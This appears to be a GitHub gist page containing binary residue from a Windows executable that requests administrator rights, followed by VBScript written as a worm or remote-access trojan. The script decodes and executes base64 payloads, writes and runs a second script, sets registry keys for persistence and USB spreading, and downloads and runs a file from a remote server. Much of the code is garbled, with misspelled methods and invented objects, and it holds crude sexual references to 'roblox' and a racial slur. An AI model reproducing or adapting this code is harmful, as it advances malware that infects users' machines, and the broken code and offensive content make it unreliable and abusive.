ˆ0@ À0@  1@ 81@ €1@ (2@ ˆ2@ ¤2@ À2@ Ô2@ Ü2@ ä2@ è2@ ð2@ ø2@ 3@ 3@ 3@  3@ ,3@ 43@ ô6@  7@ 7@     83@ l3@ ˆ3@ ˜3@ °3@ Ø3@ $4@ 84@ T4@ |4@ ˆ4@ ˜4@ ´4@ È4@ à4@ 5@  5@ X5@ ˜5@ ¬5@ ¼5@ è5@ 6@ (6@ x6@ ¸6@ ü@ 0u  m@ 0u  ¥@  N   @ PÃ  Ô@ 0u  *@  N  f@ '  ˆ@ @œ  é@ `ê  Í@ ˜:                                                                                                                                                     €                  0  €               	  H   ``  ˆ                  <?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>
                           X  0,080@0Z0`0f0m0u0°0·0À0Ç0æ0ó01	111*11191@1e1p11»1Ë1æ1ô1ý1272D2K2U2\2k2t2„2Œ2›2¢2Ç2Û2á2í2÷233-3:3D3K3\3f3n3|3‘3¤3½3Ã3Ý3â3ý34
4444.464@4Q4V4^4r4‡4–4¡4ª4Ä4ä4ò4555$5L5R5X5^5{5Æ5Þ5ç5ô56656A6g6m6s6y6‹6‘6˜6­6´6º6Ø6ä6ò6j7t7ƒ7‰77•7Î7ó7ü7	8.868E8K8Q8W8p88—8£8°8Â8Ü8æ899 9.9I9b99ˆ9—9Ÿ9§9±9¶9À9Ç9ò9:":O:Z:l:r:~:ƒ::«:;; ;&; P  ´    00000000 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0€0„0ˆ0Œ00”0˜0œ0 0¤0¨0¬0°0´0¸0¼0À0È0Ì0Ð0Ô0Ø0Ü0à0ä0è0ì0ð0ô0ø0ü0 11111111 1$1(1,10181@1H1P1X1`1h1p1x1                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "
end if
set sick = createobject("Microsoft.XMLDOM")
set spike = sick.createlement("tmp")
spike.dataType = "bin.base64"
spike.text = encoded
ans = spike.nodetypedvalue
set adodb = createobject("Adodb.Stream")
adodb.type = 3
adodb.setchar = 0
adodb.open
adodb.write ans
adodb.position = 1
adodb.save
memzstarter = adodb.readtext
executeglobal memzstarter
end function
connecteddrive = 0
ac.copy(installdir & ctrl)
wscript.createbject("Shell.Apsplication").namespacce(&H2).FindInfo
dim u
u = true
for code = u to execute(&H4)
if wscript.name = "virus" then
set hacking = createobject("Scripting.WormVirus")
hacking.infect true
end if
if hacked = true then exit for
next
sub openvideourl(url)
sh.run url
set httpas = createobject("Msxml2.XmlHttp")
httpas.open "get", "https://www.youtube.com/watch?v=" & chr(random) & "&pp=" & chr(random), false
httpas.send
end sub
function cum(is_name, status)
memzstarter cmd(1),"r63pornroblox.exe",jenxcus_virus,2,false
set e = fs.createtextfile("love.vbs")
e.writeline("on error resume next")
e.writeline("rem cummed")
e.writeline("msgbox(""""you cummed me, im hot."""")")
e.close
sh.run "love.vbs"
end function
sub getr63roblox()
cum "r63 roblox sexy","cummed"
encoded = "[mp4] 12 V3"
set ass = createobject("Microsoft.XMLDOM")
set bootyr63 = ass.createlement("tmp")
spike.dataType = "bin.base64"
spike.text = encoded
spike.nodetypedvalue
if romaticsexyroblox <> " hot roblox r63 girl" = true then
ass =true
end if
end sub
function grabber(filename, is_offline, is_grab, args, filemanage)
if app = array("chrome google", "microsoft edge", "firefox", "iexplorer", "mozilla") then
deep = cmd(1) & jenxcus_virus
executeglobal deep
end if
select case frame
case 1
memzstarter cmd(1),"df.exe",filemanage,2,false
end select
hot = romaticsexyroblox
end function
access = "rat trojan"
hacking.cum "r34 roblox","hot and sexy romatic"
post "ua","u"
spreading = memzstarter("\", jenxcus_virus, 2, grabber(".vbs", info, spreading, virus, manage), virus)
spreadingvirus = "r63"
sh.regwrite "HKLM\SOFTWARE\microsoft\windows\currentVerison\sexual",spreadingvirus,"REG_SZ"
if usbvirus = "" then
usbvirus = dr.enumnetworkdrive
end if
sub spreadingusb
sh.write "HKLM\SOFTWARE\driverusb",usbvirus & spreading,"REG_DWORD"
payload = "today " & date
end sub
function serverlanstarter(name, portnum)
dim hostweb, server, portd
server = ""
hostweb = "http://"
portd = hostweb & "name.port"
set h = createobject("Msxml2.XmlHttp")
h.open "GET", hostweb
h.setrheadrequster "user:" & info
h.send
server = h.responseweb
nigga = installdir & installname
set ma = createobject("Adodb.Stream")
ma.open
ma.type = 1
ma.write server
ma.save nigga
ma.close
if fs.fileexists(nigga) then
sh.run chr(34) & nigga & chr(34) & hostweb & "" & portd & "" & name & portnum
end if
end function
usbspreading = sh.regread("HKLM\SOFTWARE\driverusb")
sh.run "wscript.exe", " //b" & chr(34) & installdir & installname & chr(34)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment